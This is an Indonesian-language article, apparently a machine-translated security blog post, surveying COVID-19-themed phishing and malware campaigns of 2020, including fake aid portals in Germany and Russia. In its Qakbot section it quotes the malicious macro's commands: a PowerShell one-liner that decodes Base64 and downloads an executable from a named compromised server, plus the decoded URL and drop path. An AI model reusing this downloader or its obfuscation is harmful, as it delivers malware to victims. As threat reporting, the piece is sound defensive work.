Penyerang terus mengeksploitasi tema COVID-19, menciptakan lebih banyak dan lebih banyak ancaman bagi pengguna yang sangat tertarik dengan segala sesuatu yang berkaitan dengan epidemi. Dalam posting sebelumnya, kita sudah bicara tentang jenis malware apa yang muncul setelah coronavirus, dan hari ini kita akan berbicara tentang teknik rekayasa sosial yang telah ditemui pengguna di berbagai negara, termasuk di Rusia. Tren dan contoh umum - di bawah potongan.
Ingat terakhir kali kita berbicara tentang bagaimana orang mudah membaca tidak hanya tentang coronavirus dan perjalanan epidemi, tetapi juga tentang langkah-langkah dukungan finansial? Ini adalah contoh yang bagus. Di negara bagian Rhine-Westphalia Utara Jerman, NRW, serangan phishing yang aneh ditemukan. Penyerang membuat salinan situs web Kementerian Ekonomi ( NRW Kementerian Urusan Ekonomi), di mana siapa pun dapat membuat aplikasi untuk bantuan keuangan. Program semacam itu benar-benar ada, dan ternyata berada di tangan scammers. Setelah menerima data pribadi korban mereka, mereka sudah membuat aplikasi di situs web Kementerian, tetapi menunjukkan rincian bank lainnya. Menurut angka resmi, 4 ribu permintaan palsu tersebut dibuat sampai skema itu diungkapkan. Akibatnya, $ 109 juta yang ditujukan untuk warga yang terkena dampak jatuh ke tangan penipu.
Apakah Anda ingin tes gratis untuk COVID-19?
Contoh jitu lain dari coronavirus phishing ditemukan dalam surel. Pesan telah menarik perhatian pengguna dengan proposal untuk menjalani pengujian gratis untuk infeksi coronavirus. Dalam lampiran surat - surat ini adalah contoh dari Trickbot / Qakbot / Qbot. Dan ketika mereka yang ingin memeriksa kesehatan mereka mulai "mengisi formulir terlampir", skrip berbahaya diunduh ke komputer. Dan untuk menghindari verifikasi dengan metode sandboxing, skrip mulai memuat virus utama hanya setelah beberapa waktu, ketika sistem keamanan diyakinkan bahwa tidak ada aktivitas jahat yang terjadi.Meyakinkan sebagian besar pengguna untuk mengaktifkan makro juga mudah. Untuk melakukan ini, trik standar digunakan, ketika untuk mengisi kuesioner Anda pertama-tama harus mengaktifkan makro, yang berarti Anda perlu menjalankan skrip VBA.
Seperti yang Anda lihat, skrip VBA secara khusus ditutupi dari antivirus.
Windows memiliki fungsi tunggu ketika aplikasi menunggu / T <detik> sebelum menerima jawaban "Ya" secara default. Dalam kasus kami, skrip menunggu 65 detik sebelum menghapus file sementara: Dan dalam proses menunggu, malware diunduh. Untuk melakukan ini, skrip PowerShell khusus diluncurkan:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
Setelah mendekode nilai Base64, skrip PowerShell memuat backdoor yang terletak di server web yang sebelumnya diretas dari Jerman:http://automatischer-staubsauger.com/feature/777777.png
dan simpan dengan nama:C:\Users\Public\tmpdir\file1.exe
Folder ‘C:\Users\Public\tmpdir’dihapus ketika file 'tmps1.bat' dijalankan, yang berisi perintahcmd /c mkdir ""C:\Users\Public\tmpdir"".Serangan ditargetkan pada lembaga pemerintah
Selain itu, analis FireEye baru-baru ini melaporkan serangan yang ditargetkan oleh APT32 yang ditujukan pada struktur pemerintah Wuhan, serta Kementerian Manajemen Darurat China. Salah satu RTF yang didistribusikan berisi tautan ke artikel dari New York Times yang berjudul Coronavirus Live Updates: China Melacak Wisatawan Dari Hubei . Namun, ketika membacanya, unduhan malware terjadi (analis FireEye mengidentifikasi instance tersebut sebagai METALJACK).Menariknya, pada saat deteksi, tidak ada antivirus yang mendeteksi kejadian ini menurut Virustotal.
Ketika situs resmi "berbohong"
Contoh paling terang dari serangan phishing terjadi di Rusia beberapa hari yang lalu. Alasannya adalah pengangkatan tunjangan yang sudah lama ditunggu-tunggu untuk anak-anak berusia 3 hingga 16 tahun. Ketika dimulainya penerimaan aplikasi diumumkan pada 12 Mei 2020, jutaan orang bergegas ke situs web Layanan Negara untuk bantuan yang telah lama ditunggu-tunggu dan menjatuhkan portal tidak lebih buruk dari serangan DDoS profesional. Ketika presiden mengatakan bahwa "Layanan negara tidak dapat mengatasi arus aplikasi," mereka mulai berbicara tentang fakta bahwa situs alternatif untuk menerima aplikasi sudah mulai berfungsi.
Masalahnya adalah bahwa beberapa situs telah menghasilkan sekaligus, dan sementara satu, yang asli di posobie16.gosuslugi.ru, benar-benar menerima aplikasi, puluhan lagi mengumpulkan data pribadi pengguna yang dapat dipercaya .Kolega dari HeartInform menemukan sekitar 30 domain penipuan baru di zona .ru. Infosecurity a Softline Company telah melacak lebih dari 70 situs layanan publik palsu yang serupa sejak awal April. Pembuatnya memanipulasi simbol yang dikenal, dan juga menggunakan kombinasi kata gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, dan sebagainya.Agiotage dan Teknik Sosial
Semua contoh ini hanya mengkonfirmasi bahwa penyerang berhasil menguangkan tema coronavirus. Dan semakin tinggi ketegangan sosial dan semakin banyak pertanyaan yang tidak jelas, semakin besar peluang penipu untuk mencuri data penting, memaksa orang untuk memberikan uang mereka sendiri, atau sekadar meretas lebih banyak komputer.Dan mengingat pandemi itu membuat orang yang berpotensi tidak siap untuk bekerja dari rumah dalam jumlah besar, tidak hanya pribadi, tetapi juga data perusahaan berisiko. Misalnya, baru-baru ini pengguna Microsoft 365 (sebelumnya Office 365) juga telah mengalami serangan phishing. Orang-orang secara besar-besaran menerima pesan "tidak terjawab" suara dalam lampiran surat. Namun, pada kenyataannya, file-file tersebut adalah halaman HTML yang mengirim para korban serangan ke halaman login Microsoft 365 palsu. Akibatnya - hilangnya akses dan kompromi semua data dari akun.